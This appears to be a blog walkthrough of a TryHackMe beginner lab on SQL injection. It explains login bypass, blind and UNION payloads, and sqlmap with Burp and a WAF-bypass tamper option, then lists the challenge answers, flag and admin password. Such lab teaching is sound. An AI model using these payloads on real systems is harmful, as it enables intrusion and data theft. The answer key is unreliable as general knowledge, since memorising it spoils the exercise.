-->

  • TryHackMe Advent of Cyber 2 Day 5 Walkthrough

     


     
    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe Advent of Cyber 2 Day 5 Walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.



    Room :- https://tryhackme.com/room/adventofcyber2


     TryHackMe Further Nmap Walkthrough


     

    Advent of Cyber 2


    Get started with Cyber Security in 25 Days - Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

     

    [Day 5] Web Exploitation Someone stole Santa's gift list!


    After last year's attack, Santa and the security team have worked hard on reviving Santa's personal portal. Hence, 'Santa's forum 2' went live.

    After the attack, logs have revealed that someone has found Santa's panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you'll find the copy of the website and your goal is to replicate the attacker's actions by dumping the gift list!



    What is SQL Injection?

    A SQL injection (SQLi) attack consists of the injection of a SQL query to the remote web application. A successful SQL injection exploit can read sensitive data from the database (usernames & passwords), modify database data (Add/Delete), execute administration operations on the database (such as shutdown the database), and in some cases execute commands on the operating system.
    SQL Background

    SQL is a language used in programming to talk to databases. It's an extremely handy language that makes it easy for the developers to organise data in various structures. Unfortunately, the benefit always comes with a drawback; even a little misconfiguration in SQL code can lead to a potential SQL injection.

    I advise you to quickly go through this SQL command guide in order to make yourself familiar with them: TryHackMe Advent of Cyber 2 Day 5 Walkthrough



    List of SQL Commands | Codecademy






     

    It is important to mention that 1=1 in SQL stands for True (shortly you'll see the reason as to why I mention this).


    How does an SQLi attack work?


    SQLi is carried out through abusing a PHP GET parameter (for example ?username=, or ?id=) in the URL of a vulnerable web page, such as those covered in Day 2. These are usually located in the search fields and login pages, so as a penetration tester, you need to note those down.

    Here's an example of a username input field written in PHP:



     

    After a variable username was inputted in the code, PHP automatically uses SQL to select all users with the provided username. Exactly this fact can be abused by an attacker.

    Let's say a malicious user provides a quotation mark (') as the username input. Then the SQL code will look like this:

     


     

    As you can see, that mark creates a third one and generates an error since the username should only be provided with two. Exactly this error is used to exploit the SQL injection.

    Generally speaking, SQL injection is an attack in which your goal is to break SQL code execution logic, inject your own, and then 'fix' the broken part by adding comments at the end.

     


     

    Graphical interpretation

    Most commonly used comments for SQLi payloads:

     


     

    Login Bypass with SQL Injection


    One of the most powerful applications of SQL injection is definitely login bypassing. It allows an attacker to get into ANY account as long as they know either username or password to it (most commonly you'll only know username).

    First, let's find out the reason behind the possibility to do so. Say, our login application uses PHP to check if username and password match the database with following SQL query:


    SELECT username,password FROM users WHERE username='$username' and password='$password'

     

     
    As you see here, the query is using inputted username and password to validate it with the database.

    What happens if we input ' or true -- username field there? This will turn the above query into this:

    SELECT username,password FROM users WHERE username='' or true -- and password=''


     

    The -- in this case has commented out the password checking part, making the application forget to check if the password was correct. This trick allows you to log in to any account by just putting a username and payload right after it.

    Note that some websites can use a different SQL query, such as:

    SELECT username,pass FROM users WHERE username=('$username') and password=('$password')

     

    In this case, you'll have to add a single bracket to your payload like so: ') or true– to make it work.

    You can practice login bypassing on a deployed machine, port 3000 (First browse to 10.10.200.48:3000/init.php and then to 10.10.200.48:3000). I've put an extra interactive exercise there. It'll show you all back end output, allowing you to experiment and practice with SQL commands.
    Blind SQL Injection

    In some cases, developers become smart enough to mitigate SQL Injection by restricting an application from displaying any error. Happily, this does not mean we cannot perform the attack.
    Blind SQL Injection relies on changes in a web application, during the attack. In other words, an error in SQL query will be noticeable in some other form (i.e changed content or other).

    Since in this situation we can only see if an error was produced or not, blind SQLi is carried out through asking 'Yes' or 'No' questions to the database (Error = 'No', No Error = 'Yes').
    Through that system, an attacker can guess the database name, read columns and etc. Blind SQLi will take more time than other types but can be the most common one in the wild.

    Start off with finding a way to cause the SQL error and then fixing it back.

     

     


    Breaking the application

     


     

    Fixing it - Notice how the app did not output any error, even though I've clearly caused an SQL error.

    For asking the questions, you can use SUBSTR() SQL function. It extracts a substring from a string and allows us to compare the substring to a custom ASCII character.

    substr((select database()),1,1)) = 115

     

    The above code is asking the database if its name's first letter is equal to 155 ('s' in ASCII table).

    Now put this into a payload:

    ?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

     

    The payload is the question. If the application does not produce any changes, then the answer is 'Yes' (the database's first letter is 's'). Any error or change = 'No'.

     


     

    Note: You can use blind SQLi injection techniques in the 'open' situation too.
    UNION SQL Injection

    UNION SQLi is mainly used for fast database enumeration, as the UNION operator allows you to combine results of multiple SELECT statements at a time.

     

    UNION SQLi attack consists of 3 stages:

    1.     Finding the number of columns
    2.     Checking if the columns are suitable
    3.     Attack and get some interesting data.


     

    Determining the number of columns required in an SQL injection UNION attack

    There are exactly two ways to detect one:

    The first one involves injecting a series of ORDER BY queries until an error occurs. For example:

     


     


    (The last value before the error would indicate the number of columns.)

    The second one (most common and effective), would involve submitting a series of UNION SELECT payloads with a number of NULL values:

     



    No error = number of NULL matches the number of columns.
     

    Finding columns with a useful data type in an SQL injection UNION attack

    Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns, (for example 4) you can probe each column to test whether it can hold string data by replacing one of the UNION SELECT payloads with a string value. In case of 4 you would submit:

     

     


     

    No error = data type is useful for us (string).

    Using an SQL injection UNION attack to retrieve interesting data

    When you have determined the number of columns and found which columns can hold string data, you can finally start retrieving interesting data.

     

    Suppose that:

    • The first two steps showed exactly two existing columns with useful datatype.
    • The database contains a table called users with the columns username and password.


    In this situation, you can retrieve the contents of the user's table by submitting the input:

    ' UNION SELECT username, password FROM users --



    Here's a small list of thing you'd want to retrieve:

    •     database()
    •     user()
    •     @@version
    •     username
    •     password
    •     table_name
    •     column_name


     

    SQLMap


    SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It's an incredible tool that can be learned within minutes. It's already included in THM's AttackBox or you can install it locally by running:

    git clone --depth 1 <https://github.com/sqlmapproject/sqlmap.git> sqlmap-dev




     Let's show an example of an SQLMap command. Let's say we have a vulnerable login form located at "http://tbfc.net/login.php". (Note, this is just an example, please do not SQLMap this website as no consent has been given by the owner.) We would use this alongside --url to tell SQLMap where to attack. i.e. sqlmap --url http://tbfc.net/login.php

    Where we can then proceed to enumerate what data is in the application's database with options such as --tables and --columns. Leaving our final SQLMap looking like so: sqlmap --url http://tbfc.net/login.php --tables --columns

    Again, tbfc.net is given as an example, please do not perform any attack on this site.
     

    You can find a cheatsheet for more snippets of SQLMap commands here

     

     

    SQLMap & BurpSuite


    The most beneficial feature of sqlmap is its integration with BurpSuite.

    With BurpSuite, you can capture and save login or search information to use with SQLMap. This is done by intercepting a request. You will need to configure your browser to use BurpSuite as a proxy for this request to capture. The AttackBox has made this simple for you by using the FoxyProxy extension in Firefox.

        

    1) First let's startup BurpSuite located in "Applications -> Web -> BurpSuite Community Edition" on the AttackBox
    2) Use Firefox to visit the application we suspect to be vulnerable
    3) Enable FoxyProxy in Firefox:

     


     

    4) Submit a request on the web application we suspect to be vulnerable
    5) Send the request from the "Proxy" tab to the repeater by right-clicking and pressing "Send to Repeater"
    6) Notice our request is now in the "Repeater" tab:




    7) Finally, save this request by right-clicking and pressing "Save item"



    We can then use this request in SQLMap:

    sqlmap -r filename

    SQLMap will automatically translate the request and exploit the database for you.


    Challenge


    Visit the vulnerable application in Firefox, find Santa's secret login panel and bypass the login. Use some of the commands and tools covered throughout today's task to answer Questions #3 to #6.

    Santa reads some documentation that he wrote when setting up the application, it reads:

    Santa's TODO: Look at alternative database systems that are better than sqlite. Also, don't forget that you installed a Web Application Firewall (WAF) after last year's attack. In case you've forgotten the command, you can tell SQLMap to try and bypass the WAF by using --tamper=space2comment
    Resources

    Check out this cheat sheet: swisskyrepo/PayloadsAllTheThings

    Payload list: payloadbox/sql-injection-payload-list

    In-depth SQL Injection tutorial: SQLi Basics



    1) Without using directory brute forcing, what's Santa's secret login panel?

    HINT :- The name is derived out of 2 words from this question. /s**tap***l

    Ans :- /santapanel


    visit this Machine IP and it can be something else in your case. visit your machine ip with /santapanel directory.




     

    Using Burp with SQLMap

    we will bypass a login page through SQL injection,so, first we will set a proxy and open Burp suite, and enable intercep option in burp suite and after then load the page and intercept the network .




    and right click on blank side and save the file with anyname like -



    let's do SQL Injection with this command and find the answer to all the question.


    sudo sqlmap -r panel_request --tamper=space2comment --dump-all --dbms sqlite



    2) How many entries are there in the gift database?

    Ans :-  22

     

    3) What did Paul ask for?


    Ans :-  Github Ownership


    4) What is the flag?


    Ans :-  thmfox{All_I_Want_for_Christmas_Is_You}

     
    5) What is admin's password?

    Ans :- EhCNSWzzFP6sc7gB





    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


    • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.